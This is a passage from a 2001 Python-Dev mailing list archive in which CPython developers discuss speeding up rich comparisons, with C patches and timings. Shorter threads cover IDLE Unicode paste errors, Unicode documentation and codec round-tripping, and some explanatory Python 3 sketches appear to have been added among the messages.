        case Py_EQ: case Py_LE: case Py_GE:
            Py_INCREF(Py_True);
            return Py_True;
        case Py_NE: case Py_LT: case Py_GT:
            Py_INCREF(Py_False);
            return Py_False;
        }
    }

That would not help in your case, of course. I don't even know how frequent comparing identical objects is in real life - but this is something that PyObject_Compare has that PyObject_RichCompare currently doesn't. Regards, Martin From martin@loewis.home.cs.tu-berlin.de Mon May 14 22:55:39 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 23:55:39 +0200 Subject: [Python-Dev] Comparison speed Message-ID: <200105142155.f4ELtdM09420@mira.informatik.hu-berlin.de> > Anybody care to take a stab at making the new richcmp and/or coerce > code ugly again? Hi Tim, With CVS Python, 1000000 iterations, and a for loop, I currently got

    0.780 0.770 0.770 0.780 0.770 0.770 0.770 0.780 0.770 0.770

With the patch below, I get

    0.720 0.710 0.710 0.720 0.710 0.710 0.710 0.720 0.710 0.710

The idea is to let strings support richcmp; this also allows some optimization for the EQ case. Please let me know what you think.
Martin

Index: stringobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/stringobject.c,v
retrieving revision 2.115
diff -u -r2.115 stringobject.c
--- stringobject.c 2001/05/10 00:32:57 2.115
+++ stringobject.c 2001/05/14 21:36:36
@@ -596,6 +596,51 @@
     return (len_a < len_b) ? -1 : (len_a > len_b) ? 1 : 0;
 }
 
+/* In the signature, only a is guaranteed to be a PyStringObject.
+   However, as the first thing in the function, we check that b
+   is of that type also. */
+
+static PyObject*
+string_richcompare(PyStringObject *a, PyStringObject *b, int op)
+{
+    int c;
+    PyObject *result;
+    if (!PyString_Check(b)) {
+        result = Py_NotImplemented;
+        goto out;
+    }
+    if (op == Py_EQ) {
+        if (a->ob_size != b->ob_size) {
+            result = Py_False;
+            goto out;
+        }
+#ifdef CACHE_HASH
+        if (a->ob_shash != b->ob_shash
+            && a->ob_shash != -1
+            && b->ob_shash != -1) {
+            result = Py_False;
+            goto out;
+        }
+#endif
+    }
+    c = string_compare(a, b);
+    switch (op) {
+    case Py_LT: c = c < 0; break;
+    case Py_LE: c = c <= 0; break;
+    case Py_EQ: c = c == 0; break;
+    case Py_NE: c = c != 0; break;
+    case Py_GT: c = c > 0; break;
+    case Py_GE: c = c >= 0; break;
+    default:
+        result = Py_NotImplemented;
+        goto out;
+    }
+    result = c ? Py_True : Py_False;
+  out:
+    Py_INCREF(result);
+    return result;
+}
+
 static long
 string_hash(PyStringObject *a)
 {
@@ -2409,6 +2454,12 @@
     &string_as_buffer,                  /*tp_as_buffer*/
     Py_TPFLAGS_DEFAULT,                 /*tp_flags*/
     0,                                  /*tp_doc*/
+    0,                                  /*tp_traverse*/
+    0,                                  /*tp_clear*/
+    (richcmpfunc)string_richcompare,    /*tp_richcompare*/
+    0,                                  /*tp_weaklistoffset*/
+    0,                                  /*tp_iter*/
+    0,                                  /*tp_iternext*/
 };
 
 void

From gstein@lyra.org Mon May 14 23:17:56 2001 From: gstein@lyra.org (Greg Stein) Date: Mon, 14 May 2001 15:17:56 -0700 Subject: [Python-Dev] Comparison speed In-Reply-To: ; from tim@digicool.com on Mon, May 14, 2001 at 04:12:44PM -0400 References: Message-ID: <20010514151755.P1374@lyra.org> On Mon, May 14, 2001 at 04:12:44PM -0400, Tim Peters wrote: >... > Anybody care to take a stab at making the new richcmp and/or coerce code > ugly again? > > speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs - tim Euh... isn't Guido's preference for cleanliness over speed? Cheers, -g -- Greg Stein, http://www.lyra.org/ From tim@digicool.com Mon May 14 23:35:33 2001 From: tim@digicool.com (Tim Peters) Date: Mon, 14 May 2001 18:35:33 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <20010514151755.P1374@lyra.org> Message-ID: [Greg Stein] > Euh... isn't Guido's preference for cleanliness over speed? So do both. From greg@cosc.canterbury.ac.nz Tue May 15 02:42:49 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Tue, 15 May 2001 13:42:49 +1200 (NZST) Subject: [Python-Dev] Comparison speed In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de> Message-ID: <200105150142.NAA18195@s454.cosc.canterbury.ac.nz> "Martin v. Loewis" : > I also missed support for the > relationship between identity and equality. That would severely restrict the semantics that could be given to the comparison operators by overloading them.
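Greg's objection can be shown concretely. In the Python 3 sketch below, the `Vec` class is hypothetical and was written for this note. When == is overloaded to compare element by element, as numerical array packages do, `v == v` should return one result per element rather than a bare True. IEEE NaN is the standard case of an object that is not equal to itself. Current CPython takes no identity shortcut in == itself, but list containment does check identity before calling ==. That is why `nan in [nan]` is true.

```python
class Vec:
    """Hypothetical vector whose == compares element by element."""

    def __init__(self, items):
        self.items = list(items)

    def __eq__(self, other):
        # Returns a list of per-element results, not a single bool.
        return [a == b for a, b in zip(self.items, other.items)]

    __hash__ = None  # elementwise == makes hashing meaningless


nan = float("nan")
v = Vec([1, nan, 3])

print(v == v)        # [True, False, True]: an identity shortcut would give True
print(nan == nan)    # False: IEEE NaN is not equal to itself
print(nan in [nan])  # True: list containment checks identity before ==
```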
Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From guido@digicool.com Tue May 15 03:40:33 2001 From: guido@digicool.com (Guido van Rossum) Date: Mon, 14 May 2001 21:40:33 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Mon, 14 May 2001 15:17:56 MST." <20010514151755.P1374@lyra.org> References: <20010514151755.P1374@lyra.org> Message-ID: <200105150240.VAA26417@cj20424-a.reston1.va.home.com> > > speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs - tim > > Euh... isn't Guido's preference for cleanliness over speed? Yeah, Tim & I have developed a nice good-cop-bad-cop routine about this. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Tue May 15 04:36:42 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 14 May 2001 23:36:42 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > When stepping through the code, I also missed support for the > relationship between identity and equality. E.g. in > PyObject_RichCompare, I'd expect > > if (v == w) { > switch (op) > case Py_EQ:case Py_LE:case Py_GE: > Py_INCREF(Py_True); > return Py_True; > case Py_NE:case Py_LT:case Py_GT: > Py_INCREF(Py_False); > return Py_False; > } > } > > That would not help in your case, of course. I don't even know how > frequent comparing identical objects is in real life - but this is > something that PyObject_Compare has that PyObject_RichCompare > currently doesn't. 
Guido insisted (with cause ) on these four pairs as being equivalent: x < y iff y > x x <= y y >= x x == y y == x x != y y != x but beyond that, in the presence of rich comparisons, agreed not to make any other assumptions about what those pixel-bags "mean". In particular, there's no implication that "x <= y" iff "x < y or x == y", or that "x < y" implies "x != y", etc. Applying that to the above leaves you with nothing but if (v == w && op == Py_EQ) /* then return Py_True */ Which is about all PyObject_Compare's if (v == w) return 0; assumes too. So I don't see much future in that. [later, a patch to fill in the richcmp slot for strings] > +static PyObject* > +string_richcompare(PyStringObject *a, PyStringObject *b, int op) > +{ > + int c; > + PyObject *result; > + if (!PyString_Check(b)) { > + result = Py_NotImplemented; > + goto out; > + } > + if (op == Py_EQ) { > + if (a->ob_size != b->ob_size) { > + result = Py_False; > + goto out; > + } > +#ifdef CACHE_HASH > + if (a->ob_shash != b->ob_shash > + && a->ob_shash != -1 > + && b->ob_shash != -1) { > + result = Py_False; > + goto out; > + } > +#endif > + } > + c = string_compare(a, b); > + switch (op) { > + case Py_LT: c = c < 0; break; > + case Py_LE: c = c <= 0; break; > + case Py_EQ: c = c == 0; break; > + case Py_NE: c = c != 0; break; > + case Py_GT: c = c > 0; break; > + case Py_GE: c = c >= 0; break; > + default: > + result = Py_NotImplemented; > + goto out; > + } > + result = c ? Py_True : Py_False; > + out: > + Py_INCREF(result); > + return result; [and that yields about an 8% speedup in the "<" case] That looks on the right track, but maybe at the wrong level: why is it necessary? That is, the bulk of the "smarts" here in the switch stmt are type-independent: if there's no specific implementation of individual comparisons, but there is a tp_compare, then the switch stmt applies verbatim to *any* such type. Do we have to fill in the richcmp slot for everything to get Python to realize that? 
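The observation that the switch is type-independent can be illustrated in Python. Given a three-way result, all six rich operators follow mechanically. The sketch below is a Python 3 analogy, not the C fix under discussion. `ThreeWayMixin`, `_cmp` and `Version` are hypothetical names. The standard library's `functools.total_ordering` is a related but different tool: it derives the missing orderings from `__eq__` plus one ordering method.

```python
class ThreeWayMixin:
    """Derive all six rich comparisons from one three-way _cmp() method.

    _cmp(other) must return a negative, zero, or positive int, in the
    manner of the old C tp_compare slot.
    """

    __hash__ = None  # value-based == without a matching hash

    def _cmp(self, other):
        raise NotImplementedError

    def _rich(self, other, test):
        if not isinstance(other, type(self)):
            return NotImplemented
        # Same mapping as the C switch: Py_LT -> c < 0, Py_LE -> c <= 0, ...
        return test(self._cmp(other))

    def __lt__(self, other): return self._rich(other, lambda c: c < 0)
    def __le__(self, other): return self._rich(other, lambda c: c <= 0)
    def __eq__(self, other): return self._rich(other, lambda c: c == 0)
    def __ne__(self, other): return self._rich(other, lambda c: c != 0)
    def __gt__(self, other): return self._rich(other, lambda c: c > 0)
    def __ge__(self, other): return self._rich(other, lambda c: c >= 0)


class Version(ThreeWayMixin):
    """Example type that only knows how to do a three-way compare."""

    def __init__(self, *parts):
        self.parts = parts

    def _cmp(self, other):
        return (self.parts > other.parts) - (self.parts < other.parts)
```

Each comparison costs one `_cmp` call plus a sign test, which is the same work the C switch does once tp_compare has been reached. The cost Tim describes lies in the chain of calls needed to get there.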
I mean "just about everything", too: while, e.g., ceval special-cases "<" for ints, that doesn't do sorting or max or min etc on ints a lick of good (they don't go thru the COMPARE_OP opcode then, but thru the general comparison routines). The "speed problem" appears to be:

+ COMPARE_OP calls cmp_outcome()
+ which calls PyObject_RichCompare()
+ which calls do_richcmp()
+ which calls try_rich_compare() (unsuccessfully now, successfully after your patch) which fails to find a richcmp slot on either operand (now) so says "not implemented"
+ then calls try_3way_to_rich_compare()
+ which calls try_3way_compare()
+ which finally calls the tp_compare slot
+ then runs exactly the same

      switch (op) {
      case Py_LT: c = c < 0; break;
      case Py_LE: c = c <= 0; break;
      case Py_EQ: c = c == 0; break;
      case Py_NE: c = c != 0; break;
      case Py_GT: c = c > 0; break;
      case Py_GE: c = c >= 0; break;
      }
      result = c ? Py_True : Py_False;

  switch as your patch

and things unwind. So we've got 7 function calls there, not even counting calls to PyErr_Occurred() and PyObject_IsTrue(), all to find about 3 machine instructions that actually do the compare. You got an 8% speedup for one type by tricking the switch stmt into appearing 3 calls earlier. What if the implementation were smarter, and did it for *all* relevant types even a call or two before that? I don't see any reason "in principle" that compares couldn't be much faster, and via the usual gimmicks: bigger, smarter functions that remember what they've already determined so don't need to figure it out over and over again, and fast paths to favor common cases at the expense of comparisons from Mars.
One thing to note here: the workhorse comparisons are "like strings" in having no *logical* need for richcmps at all; and the objects for which richcmps were introduced were numerical arrays, which can much better afford a longer code path to *find* them (one matrix compare will trigger many vanilla element compares anyway, so even for arrays it's much more important that the *latter* be fast). The code now is approximately backwards in that respect (it takes gobs of work before we even *look* for a cmp now -- indeed, if a type has both cmp and richcmp slots now, and we're doing an explicit "cmp" compare, the code now tries to *simulate* cmp first via a long sequence of richcmp calls!). I don't have time to uglify this code, but Python would benefit from it. and-no-matter-what-guido-may-say-ly y'rs - tim From tim.one@home.com Tue May 15 04:50:00 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 14 May 2001 23:50:00 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: Message-ID: [Guido] > Index: spam.c > ... Congratulations! "My other" ISP (MSN) just started tagging suspected spam with "spam" in the subject line, and my mail reader moves that to a special spam folder upon delivery. So far this is the one and only incoming email it's moved. Many solicitations to help foreign nationals move large sums of money out of their country have gotten through, along with a number of intriguing promises that I can easily increase the size of my penis -- like I have any need for either of those . reads-every-spam-he-gets-top-to-bottom-ly y'rs - tim From esr@thyrsus.com Tue May 15 04:53:38 2001 From: esr@thyrsus.com (Eric S.
Raymond) Date: Mon, 14 May 2001 23:53:38 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: ; from tim.one@home.com on Mon, May 14, 2001 at 11:50:00PM -0400 References: Message-ID: <20010514235338.C663@thyrsus.com> Tim Peters : > Many solicitations to help foreign nationals move large sums of > money out of their country have gotten through, along with a number of > intriguing promises that I can easily increase the size of my penis -- like I > have any need for either of those . What we should truly fear is the prospect that you might increase the size of your . -- Eric S. Raymond "The state calls its own violence `law', but that of the individual `crime'" -- Max Stirner From uche.ogbuji@fourthought.com Tue May 15 05:26:31 2001 From: uche.ogbuji@fourthought.com (Uche Ogbuji) Date: Mon, 14 May 2001 22:26:31 -0600 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: Message from "Tim Peters" of "Mon, 14 May 2001 23:50:00 EDT." Message-ID: <200105150426.f4F4QVx01531@localhost.local> > [Guido] > > Index: spam.c > > ... > > Congratulations! "My other" ISP (MSN) just started tagging suspected spam > with "spam" in the subject line, and my mail reader moves that to a special > spam folder upon delivery. So far this is the one and only incoming email > it's moved. Many solicitations to help foreign nationals move large sums of > money out of their country have gotten through [...] I thought I was the only one getting all these silly Nigerian scam spams. I figured maybe they saw my name and decided to test on me (though they might more cleverly have figured that a fellow Nigerian would be wise to the game). However, with the (sloppily) bogus headers I've always found on those things, I'm surprised your ISP couldn't sniff them out. Not that it matters. The Eastern Nigerian proverb gets it right.
"Once hunters learn to shoot without missing, birds will learn to fly without resting". -- Uche Ogbuji Principal Consultant uche.ogbuji@fourthought.com +1 303 583 9900 x 101 Fourthought, Inc. http://Fourthought.com 4735 East Walnut St, Ste. C, Boulder, CO 80301-2537, USA Software-engineering, knowledge-management, XML, CORBA, Linux, Python From tim.one@home.com Tue May 15 07:28:34 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 15 May 2001 02:28:34 -0400 Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: <200105141141.NAA22376@pandora.informatik.hu-berlin.de> Message-ID: [Guido] > Postscript: using cut and paste, I *can* enter "s='äö'" in IDLE at the > Python prompt, both on Linux and on Windows 98. It prints as > '\xe4\xf6' on both systems. What changed? [Martin] > Perhaps the Tcl version? That sounds like the issue that Marc talked > about: Tk behaves differently when text is entered programmatically > (and perhaps through cut-n-paste), as compared to text entered through > the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on > Solaris 8 still gives me the UnicodeError. I don't know which version of Python Guido used. I tried cut-&-paste of s='äö' from his email into the distributed 2.1 IDLE under Win98, and got UnicodeError: ASCII encoding error: ordinal not in range(128) Tk appears to interfere with using the usual Windows ALT+0nnn method of entering funny characters, so unsure what happens then -- but for me it either works fine or does something insane (moves the cursor to the left margin, brings up an IDLE dialog box, etc). If I open the system Character Map utility and copy-&-paste using *that*, I can enter all sorts of stuff without problem: >>> s = "àáâãäåæçèéêëìíîïðñòòóôõö÷øùúûüýþÿ" >>> s '\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef \xf0\xf1\xf2\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' >>> So not all clipboard entries are created equal. 
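The UnicodeError in this thread comes from an implicit ASCII encoding of non-ASCII characters. The short sketch below uses Python 3 spelling, so the error is UnicodeEncodeError and bytes repr with a b prefix. It shows that the same two characters encode cleanly as Latin-1, giving the bytes Guido's session printed, while an ASCII encode fails. `encode_or_reason` is a hypothetical helper.

```python
def encode_or_reason(text, encoding):
    """Encode text, or return the codec's error reason if it cannot."""
    try:
        return text.encode(encoding)
    except UnicodeEncodeError as exc:
        return exc.reason


s = "äö"
print(encode_or_reason(s, "latin-1"))  # b'\xe4\xf6'
print(encode_or_reason(s, "ascii"))    # ordinal not in range(128)
```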
Another clue: if I paste the s='äö' snippet from Guido's email into a file opened with Notepad, then immediately copy it again from the Notepad doc, then paste that into Idle, again no problem: >>> s='äö' >>> s '\xe4\xf6' >>> Using a clipboard diagnostic tool I don't understand, when I copy from Notepad these data formats are in the system clipboard: TEXT LOCALE OEMTEXT But when I copy from Guido's email under Outlook 2000, it's DataObject Rich Text Format Rich Text Format Without Objects RTF as Text TEXT UNICODTEXT Ole Private Data LOCALE OEMTEXT Under Character Map, it's Rich Text Format TEXT LOCALE OEMTEXT So perhaps it's not the version of Tk but the source of the data, and that Tk grabs an unfortunate data format (when present) from the clipboard in preference to a fortunate one. the-clipboard-is-a-complex-beast-ly y'rs - tim From martin@loewis.home.cs.tu-berlin.de Tue May 15 07:44:23 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 08:44:23 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de> > Applying that to the above leaves you with nothing but > > if (v == w && op == Py_EQ) /* then return Py_True */ > > [...] So I don't see much future in that. Is this really exactly what Python would guarantee? I'm surprised that x==x would always be true, but x!=x might be true also. In a type where x!=x holds, wouldn't people also want to say that x==x might fail? IOW, I had expected that you'd reduced it to if (v == w && op == Py_EQ) /* then return Py_True */ if (v == w && op == Py_NE) /* then return Py_False */ The one application where this may help is list_contains, in particular when searching a list of interned strings. > You got an 8% speedup for one type by tricking the switch stmt into > appearing 3 calls earlier. What if the implementation were smarter, > and did it for *all* relevant types even a call or two before that? 
Please have a look at the patch below. Since I have done a CVS update since yesterday, I had to readjust the baseline results:

0.790 0.780 0.770 0.780 0.780 0.790 0.780 0.790 0.790 0.790

The patch moves the case "equal types, supporting cmp" to somewhat earlier, just after the attempt to do richcompare. Now I get

0.760 0.770 0.750 0.770 0.750 0.750 0.760 0.760 0.760 0.760

So while there is some saving (the mean drops from about 0.784 to 0.759, roughly 3%), this is not as good as implementing richcompare.

> I don't see any reason "in principle" that compares couldn't be much
> faster, and via the usual gimmicks: bigger, smarter functions that
> remember what they've already determined so don't need to figure it
> out over and over again, and fast paths to favor common cases at the
> expense of comparisons from Mars.

I agree "in principle" :-) However, you cannot move the case "equal types, implementing tp_compare" before the case "one of them implements tp_richcompare" without changing the semantics. The change here is what you'd do when you have both richcmp and oldcomp; Python clearly mandates using richcmp. In case this is not obvious (it wasn't to me): UserList will complain about using the deprecated __cmp__, and dictionaries will iterate over their elements differently.

Given that richcomp has to be tried first, this patch does the "common case" at the earliest possible time, and with no overhead except for a PyErr_Occurred call. So yes, compares can be much faster, BUT YOU HAVE TO SUPPORT TP_RICHCOMPARE (sorry for shouting). If you think the extra work for type implementors is not acceptable, we can offer a convenience function that everybody implementing tp_compare can put into tp_richcompare.

For strings, I would still special-case tp_richcompare: when tracing calls to string_richcompare, I found that most calls with Py_EQ can be decided by checking that the string lengths are not equal. This is all "bigger, faster functions" put to work.
Regards, Martin Index: object.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v retrieving revision 2.131 diff -u -r2.131 object.c --- object.c 2001/05/11 03:36:45 2.131 +++ object.c 2001/05/15 06:16:53 @@ -477,16 +477,6 @@ if (PyInstance_Check(w)) return (*w->ob_type->tp_compare)(v, w); - /* If the types are equal, don't bother with coercions etc. */ - if (v->ob_type == w->ob_type) { - if ((f = v->ob_type->tp_compare) == NULL) - return 2; - c = (*f)(v, w); - if (PyErr_Occurred()) - return -2; - return c < 0 ? -1 : c > 0 ? 1 : 0; - } - /* Try coercion; if it fails, give up */ c = PyNumber_CoerceEx(&v, &w); if (c < 0) @@ -590,15 +580,21 @@ -1 if v < w; 0 if v == w; 1 if v > w; + If the object implements a tp_compare function, it returns + whatever this function returns (whether with an exception or not). */ static int do_cmp(PyObject *v, PyObject *w) { int c; + cmpfunc f; c = try_rich_to_3way_compare(v, w); if (c < 2) return c; + if (v->ob_type == w->ob_type + && (f = v->ob_type->tp_compare) != NULL) + return (*f)(v, w); c = try_3way_compare(v, w); if (c < 2) return c; @@ -760,16 +756,9 @@ } static PyObject * -try_3way_to_rich_compare(PyObject *v, PyObject *w, int op) +convert_3way_to_object(int op, int c) { - int c; PyObject *result; - - c = try_3way_compare(v, w); - if (c >= 2) - c = default_3way_compare(v, w); - if (c <= -2) - return NULL; switch (op) { case Py_LT: c = c < 0; break; case Py_LE: c = c <= 0; break; @@ -782,16 +771,46 @@ Py_INCREF(result); return result; } + static PyObject * +try_3way_to_rich_compare(PyObject *v, PyObject *w, int op) +{ + int c; + + c = try_3way_compare(v, w); + if (c >= 2) + c = default_3way_compare(v, w); + if (c <= -2) + return NULL; + return convert_3way_to_object(op, c); +} + +static PyObject * do_richcmp(PyObject *v, PyObject *w, int op) { PyObject *res; + cmpfunc f; + res = try_rich_compare(v, w, op); if (res != Py_NotImplemented) return res; 
Py_DECREF(res); + + /* If the types are equal, don't bother with coercions etc. + Instances are special-cased in try_3way_compare, since + a result of 2 does *not* mean one value being greater + than the other. */ + if (v->ob_type == w->ob_type + && !PyInstance_Check(v) + && (f = v->ob_type->tp_compare) != NULL) { + int c; + c = (*f)(v, w); + if (PyErr_Occurred()) + return NULL; + return convert_3way_to_object(op, c); + } return try_3way_to_rich_compare(v, w, op); } From tim.one@home.com Tue May 15 08:33:06 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 15 May 2001 03:33:06 -0400 Subject: [Python-Dev] Unicode docs In-Reply-To: <3AFFA23F.248517E3@lemburg.com> Message-ID: I don't know that the Unicode docs need massive work, but the docs that are there simply don't answer the technical questions people have: they're too thin. Let's keep it simple. Contrast the Library manual's: unicode(string[, encoding[, errors]]) Decodes string using the codec for encoding. Error handling is done according to errors. The default behavior is to decode UTF-8 in strict mode, meaning that encoding errors raise ValueError. See also the codecs module. with Andrew's description (from http://www.amk.ca/python/2.0/): unicode(string [, encoding] [, errors]) Creates a Unicode string from an 8-bit string. encoding is a string naming the encoding to use. The errors parameter specifies the treatment of characters that are invalid for the current encoding; passing 'strict' as the value causes an exception to be raised on any encoding error, while 'ignore' causes errors to be silently ignored and 'replace' uses U+FFFD, the official replacement character, in case of any problems. The latter addresses several *fundamental* questions untouched by the former, like what are the datatypes of the arguments and the result, what values does errors accept, and what do they mean? The first blurb answers some more, like what's the default encoding, and which exception is raised?
Neither is complete on its own, but the reference manual should have a complete answer to all such questions. It doesn't have to go on at great length. A round-trip example would be invaluable. If Fred wanted to incorporate a brief overview too, a light rework of Andrew/Moshe's writeup would be an excellent start. From tim.one@home.com Tue May 15 08:47:16 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 15 May 2001 03:47:16 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <3AFF9F1B.A1CDD617@lemburg.com> Message-ID: [M.-A. Lemburg] > The problem is: which part would raise the exception -- the > encoder or the decoder ? Since I don't yet use any of this stuff for real, I have no idea: seems mostly a question of pragmatics, and I don't have any feel for how cp875 users would view it. > Here are some more options: > > * sort the items before creating the encoding table from the > decoding one (makes the mapping stable) If users don't care that round-trip can fail silently, fine. > * map keys which have multiple mappings in the encoding table > to None -- this causes their usage to raise an exception > (undefined mapping) If users don't care that they'll get an exception when they try something that can't be round-tripped, fine. Or would this depend on the value of the "errors" argument too? Then it's easier to impose. There's a theme here : I have no idea how important roundtrip is in Unicode Practice, or even that it's a constant across apps and encodings. If I write a codec to map all ASCII consonants to u"k" and vowels to u"a", I wouldn't care that I can't get "love" back from u"kaka" . From mal@lemburg.com Tue May 15 09:19:06 2001 From: mal@lemburg.com (M.-A. 
Lemburg) Date: Tue, 15 May 2001 10:19:06 +0200 Subject: [Python-Dev] Unicode docs References: Message-ID: <3B00E67A.C5769082@lemburg.com> Tim Peters wrote: > > I don't know that the Unicode docs need massive work, but the docs that are > there simply don't answer the technical questions people have: they're too > thin. As much as I would like to work on this, I simply don't have the time... if someone wants to contribute more detailed docs, though, I'd be glad to review them and answer remaining questions. Note that I will give a talk at the upcoming Bordeaux conference about Python and Unicode. The slides will eventually go online after the conference (in July). BTW, are any python-devs attending the conference (they have some great wine in that part of France ;-) ? -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Tue May 15 09:32:14 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Tue, 15 May 2001 10:32:14 +0200 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? References: Message-ID: <3B00E98E.1C44FF5@lemburg.com> Tim Peters wrote: > > [M.-A. Lemburg] > > The problem is: which part would raise the exception -- the > > encoder or the decoder ? > > Since I don't yet use any of this stuff for real, I have no idea: seems > mostly a question of pragmatics, and I don't have any feel for how cp875 > users would view it. If there are any... that code page dates back to 1996 and is based in the EBCDIC world. > > Here are some more options: > > > > * sort the items before creating the encoding table from the > > decoding one (makes the mapping stable) > > If users don't care that round-trip can fail silently, fine. 
> > > * map keys which have multiple mappings in the encoding table > > to None -- this causes their usage to raise an exception > > (undefined mapping) > > If users don't care that they'll get an exception when they try something > that can't be round-tripped, fine. Or would this depend on the value of the > "errors" argument too? Then it's easier to impose. The errors argument tells the codecs what to do in case a mapping fails (from codecs.py): The .encode()/.decode() methods may implement different error handling schemes by providing the errors argument. These string values are defined: 'strict' - raise a ValueError error (or a subclass) 'ignore' - ignore the character and continue with the next 'replace' - replace with a suitable replacement character; Python will use the official U+FFFD REPLACEMENT CHARACTER for the builtin Unicode codecs. 'strict' is the default for all operations that deal with auto- conversion. 'ignore' and 'replace' allow silently ignoring the problem. > There's a theme here : I have no idea how important roundtrip is in > Unicode Practice, or even that it's a constant across apps and encodings. If > I write a codec to map all ASCII consonants to u"k" and vowels to u"a", I > wouldn't care that I can't get "love" back from u"kaka" . Round-tripping is obviously very important if you use Unicode as basis for working on text. I don't know about the reasoning behind making cp875 fail the round-trip -- Unicode certainly provides means to make mappings round-trip safe (e.g. by reverting to the private Unicode char. point areas). 
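MAL lists two options for an ill-defined code page like cp875, and the following Python sketch illustrates both. It assumes a decoding table that maps byte values to characters. The toy table is hypothetical, not the real cp875 data. Inverting such a table collides whenever two bytes decode to the same character. The sketch sorts the items so that the winner is deterministic (the lowest byte value wins, an arbitrary choice). It can also map every ambiguous character to None, so that a strict encoder fails instead of silently picking one byte. The invert_decoding_map and encode helpers are illustrative only.

```python
from typing import Dict, Optional, Set, Tuple


def invert_decoding_map(
    decoding_map: Dict[int, str], mark_ambiguous: bool = False
) -> Tuple[Dict[str, Optional[int]], Set[str]]:
    """Build an encoding table and report characters with several bytes."""
    encoding_map: Dict[str, Optional[int]] = {}
    ambiguous: Set[str] = set()
    # Sorting makes the result independent of dict iteration order.
    for byte, char in sorted(decoding_map.items()):
        if char in encoding_map:
            ambiguous.add(char)  # keep the first (lowest) byte value
        else:
            encoding_map[char] = byte
    if mark_ambiguous:
        for char in ambiguous:
            encoding_map[char] = None  # treated as an undefined mapping
    return encoding_map, ambiguous


def encode(text: str, encoding_map: Dict[str, Optional[int]]) -> bytes:
    """Strict toy encoder: missing or None entries raise an error."""
    out = bytearray()
    for pos, char in enumerate(text):
        byte = encoding_map.get(char)
        if byte is None:
            raise UnicodeEncodeError("toy", text, pos, pos + 1, "undefined mapping")
        out.append(byte)
    return bytes(out)


toy_decoding = {0x41: "A", 0x42: "B", 0x5A: "A"}  # two bytes decode to "A"
stable, dups = invert_decoding_map(toy_decoding)
print(stable, dups)                       # {'A': 65, 'B': 66} {'A'}
print(encode(toy_decoding[0x5A], stable)) # b'A': byte 0x5A does not round-trip
strict, _ = invert_decoding_map(toy_decoding, mark_ambiguous=True)
```

With mark_ambiguous=True, encoding "A" raises UnicodeEncodeError. This makes the lost round trip visible, which matches the exception-raising option MAL describes.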
-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one@home.com Tue May 15 10:26:32 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 15 May 2001 05:26:32 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > Is this really exactly what Python would guarantee? I'm surprised that > x==x would always be true, but x!=x might be true also. In a type where > x!=x holds, wouldn't people also want to say that x==x might fail? IOW, > I had expected that you'd reduced it to > > if (v == w && op == Py_EQ) /* then return Py_True */ > if (v == w && op == Py_NE) /* then return Py_False */ I agree that would be more analogous to what PyObject_Compare() does. I'm not sure either make sense for rich comparisons; for example, under IEEE-754 rules, a NaN must compare not-equal to everything, including itself(!), and richcmps are the only hope Python users have of modeling that. Doing those pointer checks before giving richcmps a chance would kill that hope. Can we agree to drop this one until somebody produces stats saying it's important? I have no reason to suspect that it is. > The one application where this may help is list_contains, in > particular when searching a list of interned strings. string_compare() could special-case pointer equality too, although I suspect doing so would be a net loss. > Please have a look at the patch below. I will, but not tonight anymore -- it's been a very long day. > ... > I agree "in principle" :-) However, you cannot move the case "equal > types, implementing tp_compare" before the case "one of them > implements tp_richcompare" without changing the semantics. Of course. But except for instance objects, answering "does the type implement tp_richcompare?" 
